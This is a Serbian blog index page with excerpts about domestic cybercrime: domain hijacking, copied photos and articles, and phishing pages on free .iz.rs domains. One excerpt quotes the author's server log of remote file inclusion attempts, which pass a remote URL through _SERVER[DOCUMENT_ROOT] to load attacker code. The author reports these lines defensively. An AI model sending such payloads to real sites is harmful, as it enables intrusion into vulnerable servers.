Izbornik Zatvoriti

I mi kompjuterske kriminalce imamo

Nije retko da čujete kako su naši ljudi eksperti za računare i da su među prvima u svetu po znanju i umenju. Kao i u mngim drugim delatnostima, tako i u računarskom svetu, zanje i umeće se često testira u kriminalnim radnjama. Pa da vidimo čime se to bave naši kompjuterski genijalci naklonjeni kriminalu.

Kradljivac domena

U aprilu 2008, M. R. je preoteo vlasništvo nad jednim domenom i sajtom tako što je iskoristio bezbednosni propust, upao na sajt, izmenio podatke tako da se predstavi kao da je vlasnik, i onda na osnovu toga od provajdera tražio i dobio ovlašćenja da administrira domen, što je iskoristio da zaista i preuzme vlasništvo nad domenom, otevši ga od pravog vlasnika. […]
[ ... vidi ceo članak ... ]

Internet – velika besplatna samoposluga za novine

Mogu da zamislim scenu: prelamač dobio članak, sređuje ga ali mu treba ilustracija, a nema je. Ali, Gugl je čudo, otvoriš ga, ukucaš „uzice“, pređeš na stranu za pregled pronađenih fotografija, i eto na drugom mestu baš lepa panorama. Kopienpejstuješ u fotošop, malo mu ga daš po kropu i gotovo, sređen članak:

Baš se lepo uklopilo u ovom članku na sajtu Glasa Javnosti (www.glas-javnosti.rs) zar ne? Ma čudo je taj Internet, na njemu sve ima. Koliko je lakši posao, ne moraš da se cimaš po sopstvenoj arhivi ili još gore da moljakaš za fotku ako nemaš odgovarajuću u arhivi, samo srč, i eto odmah veliki izbor, ko u samoposluzi. […]
[ ... vidi ceo članak ... ]

Phishing ponovo jaše

Pre dva meseca pisao sam o zloupotrebi domena facebook.iz.rs za pokušaj krađe lozinki korisnika Fejsbuka . Danas je otkriven još jedan takav pokušaj sa domenom city-shop.iz.rs.

Ovaj domen je registrovan, na njega je postavljen neki sadržaj koji daje utisak da se radi o internet prodavnici, mada se po sadržaju vidi da nije aktivirana. Međutim u pozadini, duboko je zakopana strana koja simulira PayPal stranu za prijavu, namenjena za krađu lozinki korisnika ovog servisa za plaćanje.

Neoprezni internet korisnici, kojima su zlonamernici nameravali da podmeću ovu stranu umesto pravog PayPal-a ne bi primetili razliku, upisali bi svoju lozinku i napravili sebi veliki problem. […]
[ ... vidi ceo članak ... ]

Posle male pauze – opet mi ukradoše članak

Nedavno sam objavio članak o geolokacionim servisima koji omogućavaju da sajtovi znaju gde se nalazite, a danas dobih „tip“ od posetioca da je isti članak video na forumu Vrnjačka banja (vrnjackabanjaforum.com) na adresi http://www.vrnjackabanjaforum.com/first/viewtopic.php?f=34&t=240

Proverim, kad ono stvarno: iskopiran je tekst, nešto je čak dopisano ispod njega ali ko ne zna, ne može da vidi da to nije deo originala, i čak je tekst potpisan. Ilustracija koja ide uz članak nije preneta, ali to je verovatno zato što sam zabranio linkovanje slika sa nepoznatih sjatova (pogledajte Hotlinking: kad vam drugi sajtovi troše resurse), a kopirača je verovatno mrzelo da sliku snimi pa postavlja na forum kopiju. […]
[ ... vidi ceo članak ... ]

Hakerski napad na blog

Danas sam u logu primetio pokušaje napada na blog. Napadi su suviše naivni i neuspeli ali će možda nekome biti interesantno da vidi. Evo loga jedno napada sa adrese: 195.146.81.144 (host2.relline.ru)

/redirekcija-putanja-url-rewriti...avan-nacin/comment-page-1%20%20

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriti...avan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin/comment-page-1///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin?_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

Zar se ovaj stvarno nadao da će ovako nešto da prođe? Jedno tri-čeitiri godine ranije bi možda imao neku šansu da nabasa na kakav sajt koji je toliko bušan da ovaj napad uspe.

Bilo bi zanimljivo imati neki dodatak koji bi prepoznavao ovakve pokušaje pa ubijao konekcije koliko da se ne troši protok bezveze. […]
[ ... vidi ceo članak ... ]

Domaći slučaj phishing-a

Ne jednom su mi zamerali zašto insistiram na jasnim pisanim pravilima vezanim za registraciju besplatnih .iz.rs domena i zašto svaki registrovani domen prolazi ručnu proveru. Optuživan sam čak da sve to radim zato da bih zadovoljavao neku svoju sujetu i davao sebi na važnosti tako što ću da odlučujem kome ću da dozvoljavam da registruje domen. Stvar je nažalost banalna: kada je nešto besplatno velika je jagma, a naročito od onih koji su skloni zlouporebama i kriminalu.

Jedna od situacija zbog kojih je proveravanje domena neophodno se dogodila danas. Danas je registrovan domen facebook.iz.rs (ne morate otvarati sajt pošto je on već ugašen). […]
[ ... vidi ceo članak ... ]